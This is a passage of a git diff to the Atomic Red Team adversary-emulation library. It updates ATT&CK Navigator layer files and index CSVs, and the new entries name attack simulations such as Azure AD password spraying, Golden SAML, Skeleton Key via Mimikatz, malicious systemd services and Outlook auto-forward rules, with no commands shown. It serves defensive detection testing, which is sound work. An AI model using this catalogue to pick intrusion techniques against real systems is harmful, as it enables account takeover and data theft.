Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1578/T1578.md"}]},{"techniqueID":"T1578.001","score":1,"enabled":true,"comment":"\n- AWS - Create Snapshot from EBS Volume\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1578.001/T1578.001.md"}]},{"techniqueID":"T1580","score":2,"enabled":true,"comment":"\n- AWS - EC2 Enumeration from Cloud Instance\n- AWS - EC2 Security Group Enumeration\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1580/T1580.md"}]},{"techniqueID":"T1619","score":1,"enabled":true,"comment":"\n- AWS S3 Enumeration\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1619/T1619.md"}]},{"techniqueID":"T1648","score":1,"enabled":true,"comment":"\n- Lambda Function Hijack\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1648/T1648.md"}]},{"techniqueID":"T1651","score":1,"enabled":true,"comment":"\n- AWS Run Command (and Control)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1651/T1651.md"}]}]}

atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-iaas-azure.json

@@ -1 +1 @@
-{"name":"Atomic Red Team (Iaas:Azure)","versions":{"attack":"16","navigator":"5.1.0","layer":"4.5"},"description":"Atomic Red Team (Iaas:Azure) MITRE ATT&CK Navigator Layer","domain":"enterprise-attack","filters":{},"gradient":{"colors":["#ffffff","#ce232e"],"minValue":0,"maxValue":10},"legendItems":[{"label":"10 or more tests","color":"#ce232e"},{"label":"1 or more tests","color":"#ffffff"}],"techniques":[{"techniqueID":"T1078","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078/T1078.md"}]},{"techniqueID":"T1078.004","score":1,"enabled":true,"comment":"\n- Azure Persistence Automation Runbook Created or Modified\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.004/T1078.004.md"}]},{"techniqueID":"T1098","score":2,"enabled":true,"comment":"\n- Azure - adding user to Azure role in subscription\n- Azure - adding service principal to Azure role in subscription\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"}]},{"techniqueID":"T1526","score":2,"enabled":true,"comment":"\n- Azure - Dump Subscription Data with MicroBurst\n- Azure - Enumerate common cloud services\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1526/T1526.md"}]},{"techniqueID":"T1528","score":2,"enabled":true,"comment":"\n- Azure - Functions code upload - Functions code injection via Blob upload\n- Azure - Functions code upload - Functions code injection via File Share modification to retrieve the Functions identity access token\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1528/T1528.md"}]},{"techniqueID":"T1530","score":1,"enabled":true,"comment":"\n- Azure - Dump Azure Storage Account Objects via Azure CLI\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1530/T1530.md"}]},{"techniqueID":"T1552","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552/T1552.md"}]},{"techniqueID":"T1552.005","score":1,"enabled":true,"comment":"\n- Azure - Dump Azure Instance Metadata from Virtual Machines\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.005/T1552.005.md"}]},{"techniqueID":"T1555","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555/T1555.md"}]},{"techniqueID":"T1555.006","score":1,"enabled":true,"comment":"\n- Azure - Dump All Azure Key Vaults with Microburst\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.006/T1555.006.md"}]},{"techniqueID":"T1562","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562/T1562.md"}]},{"techniqueID":"T1562.008","score":1,"enabled":true,"comment":"\n- Azure - Eventhub Deletion\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.008/T1562.008.md"}]},{"techniqueID":"T1578","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1578/T1578.md"}]},{"techniqueID":"T1578.001","score":1,"enabled":true,"comment":"\n- Azure - Create Snapshot from Managed Disk\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1578.001/T1578.001.md"}]},{"techniqueID":"T1619","score":3,"enabled":true,"comment":"\n- Azure - Enumerate Storage Account Objects via Shared Key authorization using Azure CLI\n- Azure - Scan for Anonymous Access to Azure Storage (Powershell)\n- Azure - Enumerate Azure Blobs with MicroBurst\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1619/T1619.md"}]}]}
+{"name":"Atomic Red Team (Iaas:Azure)","versions":{"attack":"18","navigator":"5.3.0","layer":"4.5"},"description":"Atomic Red Team (Iaas:Azure) MITRE ATT&CK Navigator Layer","domain":"enterprise-attack","filters":{},"gradient":{"colors":["#ffffff","#ce232e"],"minValue":0,"maxValue":10},"legendItems":[{"label":"10 or more tests","color":"#ce232e"},{"label":"1 or more tests","color":"#ffffff"}],"techniques":[{"techniqueID":"T1078","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078/T1078.md"}]},{"techniqueID":"T1078.004","score":1,"enabled":true,"comment":"\n- Azure Persistence Automation Runbook Created or Modified\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.004/T1078.004.md"}]},{"techniqueID":"T1098","score":2,"enabled":true,"comment":"\n- Azure - adding user to Azure role in subscription\n- Azure - adding service principal to Azure role in subscription\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"}]},{"techniqueID":"T1526","score":2,"enabled":true,"comment":"\n- Azure - Dump Subscription Data with MicroBurst\n- Azure - Enumerate common cloud services\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1526/T1526.md"}]},{"techniqueID":"T1528","score":2,"enabled":true,"comment":"\n- Azure - Functions code upload - Functions code injection via Blob upload\n- Azure - Functions code upload - Functions code injection via File Share modification to retrieve the Functions identity access token\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1528/T1528.md"}]},{"techniqueID":"T1530","score":1,"enabled":true,"comment":"\n- Azure - Dump Azure Storage Account Objects via Azure CLI\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1530/T1530.md"}]},{"techniqueID":"T1552","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552/T1552.md"}]},{"techniqueID":"T1552.005","score":1,"enabled":true,"comment":"\n- Azure - Dump Azure Instance Metadata from Virtual Machines\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.005/T1552.005.md"}]},{"techniqueID":"T1555","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555/T1555.md"}]},{"techniqueID":"T1555.006","score":1,"enabled":true,"comment":"\n- Azure - Dump All Azure Key Vaults with Microburst\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.006/T1555.006.md"}]},{"techniqueID":"T1562","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562/T1562.md"}]},{"techniqueID":"T1562.008","score":1,"enabled":true,"comment":"\n- Azure - Eventhub Deletion\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.008/T1562.008.md"}]},{"techniqueID":"T1578","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1578/T1578.md"}]},{"techniqueID":"T1578.001","score":1,"enabled":true,"comment":"\n- Azure - Create Snapshot from Managed Disk\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1578.001/T1578.001.md"}]},{"techniqueID":"T1619","score":3,"enabled":true,"comment":"\n- Azure - Enumerate Storage Account Objects via Shared Key authorization using Azure CLI\n- Azure - Scan for Anonymous Access to Azure Storage (Powershell)\n- Azure - Enumerate Azure Blobs with MicroBurst\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1619/T1619.md"}]}]}

atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-iaas-gcp.json

@@ -1 +1 @@
-{"name":"Atomic Red Team (Iaas:GCP)","versions":{"attack":"16","navigator":"5.1.0","layer":"4.5"},"description":"Atomic Red Team (Iaas:GCP) MITRE ATT&CK Navigator Layer","domain":"enterprise-attack","filters":{},"gradient":{"colors":["#ffffff","#ce232e"],"minValue":0,"maxValue":10},"legendItems":[{"label":"10 or more tests","color":"#ce232e"},{"label":"1 or more tests","color":"#ffffff"}],"techniques":[{"techniqueID":"T1078","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078/T1078.md"}]},{"techniqueID":"T1078.004","score":2,"enabled":true,"comment":"\n- Creating GCP Service Account and Service Account Key\n- GCP - Create Custom IAM Role\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.004/T1078.004.md"}]},{"techniqueID":"T1098","score":1,"enabled":true,"comment":"\n- GCP - Delete Service Account Key\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"}]},{"techniqueID":"T1485","score":1,"enabled":true,"comment":"\n- GCP - Delete Bucket\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1485/T1485.md"}]},{"techniqueID":"T1562","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562/T1562.md"}]},{"techniqueID":"T1562.008","score":1,"enabled":true,"comment":"\n- GCP - Delete Activity Event Log\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.008/T1562.008.md"}]},{"techniqueID":"T1578","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1578/T1578.md"}]},{"techniqueID":"T1578.001","score":1,"enabled":true,"comment":"\n- GCP - Create Snapshot from Persistent Disk\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1578.001/T1578.001.md"}]}]}
+{"name":"Atomic Red Team (Iaas:GCP)","versions":{"attack":"18","navigator":"5.3.0","layer":"4.5"},"description":"Atomic Red Team (Iaas:GCP) MITRE ATT&CK Navigator Layer","domain":"enterprise-attack","filters":{},"gradient":{"colors":["#ffffff","#ce232e"],"minValue":0,"maxValue":10},"legendItems":[{"label":"10 or more tests","color":"#ce232e"},{"label":"1 or more tests","color":"#ffffff"}],"techniques":[{"techniqueID":"T1078","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078/T1078.md"}]},{"techniqueID":"T1078.004","score":2,"enabled":true,"comment":"\n- Creating GCP Service Account and Service Account Key\n- GCP - Create Custom IAM Role\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.004/T1078.004.md"}]},{"techniqueID":"T1098","score":1,"enabled":true,"comment":"\n- GCP - Delete Service Account Key\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"}]},{"techniqueID":"T1485","score":1,"enabled":true,"comment":"\n- GCP - Delete Bucket\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1485/T1485.md"}]},{"techniqueID":"T1562","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562/T1562.md"}]},{"techniqueID":"T1562.008","score":1,"enabled":true,"comment":"\n- GCP - Delete Activity Event Log\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.008/T1562.008.md"}]},{"techniqueID":"T1578","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1578/T1578.md"}]},{"techniqueID":"T1578.001","score":1,"enabled":true,"comment":"\n- GCP - Create Snapshot from Persistent Disk\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1578.001/T1578.001.md"}]}]}

atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-office-365.json

@@ -1 +1 @@
-{"name":"Atomic Red Team (Office-365)","versions":{"attack":"16","navigator":"5.1.0","layer":"4.5"},"description":"Atomic Red Team (Office-365) MITRE ATT&CK Navigator Layer","domain":"enterprise-attack","filters":{},"gradient":{"colors":["#ffffff","#ce232e"],"minValue":0,"maxValue":10},"legendItems":[{"label":"10 or more tests","color":"#ce232e"},{"label":"1 or more tests","color":"#ffffff"}],"techniques":[{"techniqueID":"T1098","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"}]},{"techniqueID":"T1098.002","score":1,"enabled":true,"comment":"\n- EXO - Full access mailbox permission granted to a user\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.002/T1098.002.md"}]},{"techniqueID":"T1114","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114/T1114.md"}]},{"techniqueID":"T1114.002","score":1,"enabled":true,"comment":"\n- Office365 - Remote Mail Collected\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114.002/T1114.002.md"}]},{"techniqueID":"T1114.003","score":1,"enabled":true,"comment":"\n- Office365 - Email Forwarding\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114.003/T1114.003.md"}]},{"techniqueID":"T1562","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562/T1562.md"}]},{"techniqueID":"T1562.001","score":1,"enabled":true,"comment":"\n- office-365-Disable-AntiPhishRule\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"}]},{"techniqueID":"T1562.008","score":2,"enabled":true,"comment":"\n- Office 365 - Exchange Audit Log Disabled\n- Office 365 - Set Audit Bypass For a Mailbox\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.008/T1562.008.md"}]},{"techniqueID":"T1564","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564/T1564.md"}]},{"techniqueID":"T1564.008","score":1,"enabled":true,"comment":"\n- New-Inbox Rule to Hide E-mail in M365\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.008/T1564.008.md"}]}]}
+{"name":"Atomic Red Team (Office-365)","versions":{"attack":"18","navigator":"5.3.0","layer":"4.5"},"description":"Atomic Red Team (Office-365) MITRE ATT&CK Navigator Layer","domain":"enterprise-attack","filters":{},"gradient":{"colors":["#ffffff","#ce232e"],"minValue":0,"maxValue":10},"legendItems":[{"label":"10 or more tests","color":"#ce232e"},{"label":"1 or more tests","color":"#ffffff"}],"techniques":[{"techniqueID":"T1098","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"}]},{"techniqueID":"T1098.002","score":1,"enabled":true,"comment":"\n- EXO - Full access mailbox permission granted to a user\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.002/T1098.002.md"}]},{"techniqueID":"T1114","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114/T1114.md"}]},{"techniqueID":"T1114.002","score":1,"enabled":true,"comment":"\n- Office365 - Remote Mail Collected\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114.002/T1114.002.md"}]},{"techniqueID":"T1114.003","score":1,"enabled":true,"comment":"\n- Office365 - Email Forwarding\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114.003/T1114.003.md"}]},{"techniqueID":"T1562","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562/T1562.md"}]},{"techniqueID":"T1562.001","score":1,"enabled":true,"comment":"\n- office-365-Disable-AntiPhishRule\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"}]},{"techniqueID":"T1562.008","score":2,"enabled":true,"comment":"\n- Office 365 - Exchange Audit Log Disabled\n- Office 365 - Set Audit Bypass For a Mailbox\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.008/T1562.008.md"}]},{"techniqueID":"T1564","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564/T1564.md"}]},{"techniqueID":"T1564.008","score":1,"enabled":true,"comment":"\n- New-Inbox Rule to Hide E-mail in M365\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.008/T1564.008.md"}]}]}

atomics/Indexes/Indexes-CSV/azure-ad-index.csv

@@ -1 +1,23 @@
 Tactic,Technique #,Technique Name,Test #,Test Name,Test GUID,Executor Name
+credential-access,T1110.001,Brute Force: Password Guessing,3,Brute Force Credentials of single Azure AD user,5a51ef57-299e-4d62-8e11-2d440df55e69,powershell
+credential-access,T1606.002,Forge Web Credentials: SAML token,1,Golden SAML,b16a03bc-1089-4dcc-ad98-30fe8f3a2b31,powershell
+credential-access,T1110.003,Brute Force: Password Spraying,4,Password spray all Azure AD users with a single password,a8aa2d3e-1c52-4016-bc73-0f8854cfa80a,powershell
+credential-access,T1110.003,Brute Force: Password Spraying,7,Password Spray Microsoft Online Accounts with MSOLSpray (Azure/O365),f3a10056-0160-4785-8744-d9bd7c12dc39,powershell
+defense-evasion,T1484.002,Domain Trust Modification,1,Add Federation to Azure AD,8906c5d0-3ee5-4f63-897a-f6cafd3fdbb7,powershell
+privilege-escalation,T1484.002,Domain Trust Modification,1,Add Federation to Azure AD,8906c5d0-3ee5-4f63-897a-f6cafd3fdbb7,powershell
+privilege-escalation,T1098.003,Account Manipulation: Additional Cloud Roles,1,Azure AD - Add Company Administrator Role to a user,4d77f913-56f5-4a14-b4b1-bf7bb24298ad,powershell
+privilege-escalation,T1098.003,Account Manipulation: Additional Cloud Roles,2,Simulate - Post BEC persistence via user password reset followed by user added to company administrator role,14f3af20-61f1-45b8-ad31-4637815f3f44,powershell
+privilege-escalation,T1098.001,Account Manipulation: Additional Cloud Credentials,1,Azure AD Application Hijacking - Service Principal,b8e747c3-bdf7-4d71-bce2-f1df2a057406,powershell
+privilege-escalation,T1098.001,Account Manipulation: Additional Cloud Credentials,2,Azure AD Application Hijacking - App Registration,a12b5531-acab-4618-a470-0dafb294a87a,powershell
+privilege-escalation,T1098,Account Manipulation,4,Azure AD - adding user to Azure AD role,0e65ae27-5385-46b4-98ac-607a8ee82261,powershell
+privilege-escalation,T1098,Account Manipulation,5,Azure AD - adding service principal to Azure AD role,92c40b3f-c406-4d1f-8d2b-c039bf5009e4,powershell
+privilege-escalation,T1098,Account Manipulation,8,Azure AD - adding permission to application,94ea9cc3-81f9-4111-8dde-3fb54f36af4b,powershell
+persistence,T1098.003,Account Manipulation: Additional Cloud Roles,1,Azure AD - Add Company Administrator Role to a user,4d77f913-56f5-4a14-b4b1-bf7bb24298ad,powershell
+persistence,T1098.003,Account Manipulation: Additional Cloud Roles,2,Simulate - Post BEC persistence via user password reset followed by user added to company administrator role,14f3af20-61f1-45b8-ad31-4637815f3f44,powershell
+persistence,T1098.001,Account Manipulation: Additional Cloud Credentials,1,Azure AD Application Hijacking - Service Principal,b8e747c3-bdf7-4d71-bce2-f1df2a057406,powershell
+persistence,T1098.001,Account Manipulation: Additional Cloud Credentials,2,Azure AD Application Hijacking - App Registration,a12b5531-acab-4618-a470-0dafb294a87a,powershell
+persistence,T1136.003,Create Account: Cloud Account,2,Azure AD - Create a new user,e62d23ef-3153-4837-8625-fa4a3829134d,powershell
+persistence,T1136.003,Create Account: Cloud Account,3,Azure AD - Create a new user via Azure CLI,228c7498-be31-48e9-83b7-9cb906504ec8,powershell
+persistence,T1098,Account Manipulation,4,Azure AD - adding user to Azure AD role,0e65ae27-5385-46b4-98ac-607a8ee82261,powershell
+persistence,T1098,Account Manipulation,5,Azure AD - adding service principal to Azure AD role,92c40b3f-c406-4d1f-8d2b-c039bf5009e4,powershell
+persistence,T1098,Account Manipulation,8,Azure AD - adding permission to application,94ea9cc3-81f9-4111-8dde-3fb54f36af4b,powershell

atomics/Indexes/Indexes-CSV/esxi-index.csv

@@ -0,0 +1 @@
+Tactic,Technique #,Technique Name,Test #,Test Name,Test GUID,Executor Name

atomics/Indexes/Indexes-CSV/index.csv

@@ -609,6 +609,7 @@ defense-evasion,T1562.008,Impair Defenses: Disable Cloud Logs,11,AWS - Config Lo
 defense-evasion,T1564.003,Hide Artifacts: Hidden Window,1,Hidden Window,f151ee37-9e2b-47e6-80e4-550b9f999b7a,powershell
 defense-evasion,T1564.003,Hide Artifacts: Hidden Window,2,Headless Browser Accessing Mockbin,0ad9ab92-c48c-4f08-9b20-9633277c4646,command_prompt
 defense-evasion,T1564.003,Hide Artifacts: Hidden Window,3,Hidden Window-Conhost Execution,5510d22f-2595-4911-8456-4d630c978616,powershell
+defense-evasion,T1556.001,Modify Authentication Process: Domain Controller Authentication,1,Skeleton Key via Mimikatz,0ee8081f-e9a7-4a2e-a23f-68473023184f,powershell
 defense-evasion,T1027.006,HTML Smuggling,1,HTML Smuggling Remote Payload,30cbeda4-08d9-42f1-8685-197fad677734,powershell
 defense-evasion,T1070.004,Indicator Removal on Host: File Deletion,1,Delete a single file - FreeBSD/Linux/macOS,562d737f-2fc6-4b09-8c2a-7f8ff0828480,sh
 defense-evasion,T1070.004,Indicator Removal on Host: File Deletion,2,Delete an entire folder - FreeBSD/Linux/macOS,a415f17e-ce8d-4ce2-a8b4-83b674e7017e,sh
@@ -1032,6 +1033,14 @@ execution,T1106,Native API,3,WinPwn - Get SYSTEM shell - Bind System Shell using
 execution,T1106,Native API,4,WinPwn - Get SYSTEM shell - Pop System Shell using NamedPipe Impersonation technique,e1f93a06-1649-4f07-89a8-f57279a7d60e,powershell
 execution,T1106,Native API,5,Run Shellcode via Syscall in Go,ae56083f-28d0-417d-84da-df4242da1f7c,powershell
 execution,T1059.010,Command and Scripting Interpreter: AutoHotKey & AutoIT,1,AutoHotKey script execution,7b5d350e-f758-43cc-a761-8e3f6b052a03,powershell
+execution,T1569.003,System Services: Systemctl,1,Create and Enable a Malicious systemd Service Unit,e58c8723-5503-4533-b642-535cd20ec648,sh
+execution,T1569.003,System Services: Systemctl,2,Create systemd Service Unit from /tmp (Unusual Location),a1fa406e-2354-4a24-b6d6-94157e7564d4,sh
+execution,T1569.003,System Services: Systemctl,3,Create systemd Service Unit from /dev/shm (Unusual Location),dce49381-a26b-4d95-bdfa-c607ffe8bee5,sh
+execution,T1569.003,System Services: Systemctl,4,Modify Existing systemd Service to Execute Malicious Command,6123928f-6389-4914-8d25-a5d69bd657fa,sh
+execution,T1569.003,System Services: Systemctl,5,Execute Command via Transient systemd Service (systemd-run),a73a886f-23c5-4e8f-b1ab-b1bbc1f5e236,sh
+execution,T1569.003,System Services: Systemctl,6,Enumerate All systemd Services Using systemctl,1e5be8d4-605a-4acb-8709-2f80b2d8ea95,sh
+execution,T1569.003,System Services: Systemctl,7,Enable systemd Service for Persistence with Auto-Restart,2fc6c0ab-4f88-4eb8-ab1b-f739fc22bba7,sh
+execution,T1569.003,System Services: Systemctl,8,Masquerade Malicious Service as Legitimate System Service,6fec8560-ff64-4bbf-bc79-734fea48f7ca,sh
 execution,T1610,Deploy a container,1,Deploy Docker container,59aa6f26-7620-417e-9318-589e0fb7a372,bash
 execution,T1059,Command and Scripting Interpreter,1,AutoIt Script Execution,a9b93f17-31cb-435d-a462-5e838a2a6026,powershell
 execution,T1609,Kubernetes Exec Into Container,1,ExecIntoContainer,d03bfcd3-ed87-49c8-8880-44bb772dea4b,bash
@@ -1176,6 +1185,11 @@ persistence,T1176,Browser Extensions,1,Chrome/Chromium (Developer Mode),3ecd790d
 persistence,T1176,Browser Extensions,2,Firefox,cb790029-17e6-4c43-b96f-002ce5f10938,manual
 persistence,T1176,Browser Extensions,3,Edge Chromium Addon - VPN,3d456e2b-a7db-4af8-b5b3-720e7c4d9da5,manual
 persistence,T1176,Browser Extensions,4,Google Chrome Load Unpacked Extension With Command Line,7a714703-9f6b-461c-b06d-e6aeac650f27,powershell
+persistence,T1137.005,Office Application Startup: Outlook Rules,1,Outlook Rule - Subject Trigger with DeletePermanently Action via COM Object,ffadc988-b682-4a68-bd7e-4803666be637,powershell
+persistence,T1137.005,Office Application Startup: Outlook Rules,2,Outlook Rule - Sender Address Trigger with DeletePermanently Action via COM Object,bddfd8d4-7687-4971-b611-50a537ab3ab4,powershell
+persistence,T1137.005,Office Application Startup: Outlook Rules,3,Outlook Rule - Auto-Forward Emails to External Address via COM Object,b0bd3d76-a57c-4699-83f4-8cd798dd09bd,powershell
+persistence,T1137.005,Office Application Startup: Outlook Rules,4,Outlook Rules - Enumerate Existing Rules via PowerShell COM Object,5ff5249a-5807-480e-ab52-c430497a8a25,powershell
+persistence,T1137.005,Office Application Startup: Outlook Rules,5,Outlook Rule - Create Rule with Obfuscated Blank Name (MAPI Evasion),cb814cf8-24f2-41dc-a1cd-1c2073276d4a,powershell
 persistence,T1546.011,Event Triggered Execution: Application Shimming,1,Application Shim Installation,9ab27e22-ee62-4211-962b-d36d9a0e6a18,command_prompt
 persistence,T1546.011,Event Triggered Execution: Application Shimming,2,New shim database files created in the default shim database directory,aefd6866-d753-431f-a7a4-215ca7e3f13d,powershell
 persistence,T1546.011,Event Triggered Execution: Application Shimming,3,Registry key creation and/or modification events for SDB,9b6a06f9-ab5e-4e8d-8289-1df4289db02f,powershell
@@ -1425,6 +1439,7 @@ persistence,T1546.002,Event Triggered Execution: Screensaver,1,Set Arbitrary Bin
 persistence,T1543.001,Create or Modify System Process: Launch Agent,1,Launch Agent,a5983dee-bf6c-4eaf-951c-dbc1a7b90900,bash
 persistence,T1543.001,Create or Modify System Process: Launch Agent,2,Event Monitor Daemon Persistence,11979f23-9b9d-482a-9935-6fc9cd022c3e,bash
 persistence,T1543.001,Create or Modify System Process: Launch Agent,3,Launch Agent - Root Directory,66774fa8-c562-4bae-a58d-5264a0dd9dd7,bash
+persistence,T1556.001,Modify Authentication Process: Domain Controller Authentication,1,Skeleton Key via Mimikatz,0ee8081f-e9a7-4a2e-a23f-68473023184f,powershell
 persistence,T1037.004,Boot or Logon Initialization Scripts: Rc.common,1,rc.common,97a48daa-8bca-4bc0-b1a9-c1d163e762de,bash
 persistence,T1037.004,Boot or Logon Initialization Scripts: Rc.common,2,rc.common,c33f3d80-5f04-419b-a13a-854d1cbdbf3a,bash
 persistence,T1037.004,Boot or Logon Initialization Scripts: Rc.common,3,rc.local,126f71af-e1c9-405c-94ef-26a47b16c102,sh
@@ -1464,6 +1479,7 @@ persistence,T1574.012,Hijack Execution Flow: COR_PROFILER,3,Registry-free proces
 command-and-control,T1132.001,Data Encoding: Standard Encoding,1,Base64 Encoded data.,1164f70f-9a88-4dff-b9ff-dc70e7bf0c25,sh
 command-and-control,T1132.001,Data Encoding: Standard Encoding,2,Base64 Encoded data (freebsd),2d97c626-7652-449e-a986-b02d9051c298,sh
 command-and-control,T1132.001,Data Encoding: Standard Encoding,3,XOR Encoded data.,c3ed6d2a-e3ad-400d-ad78-bbfdbfeacc08,powershell
+command-and-control,T1568.002,Dynamic Resolution: Domain Generation Algorithms,1,DGA Simulation (Python),cc367493-3a00-4c4a-a685-16b73339167c,bash
 command-and-control,T1071.004,Application Layer Protocol: DNS,1,DNS Large Query Volume,1700f5d6-5a44-487b-84de-bc66f507b0a6,powershell
 command-and-control,T1071.004,Application Layer Protocol: DNS,2,DNS Regular Beaconing,3efc144e-1af8-46bb-8ca2-1376bb6db8b6,powershell
 command-and-control,T1071.004,Application Layer Protocol: DNS,3,DNS Long Domain Query,fef31710-223a-40ee-8462-a396d6b66978,powershell
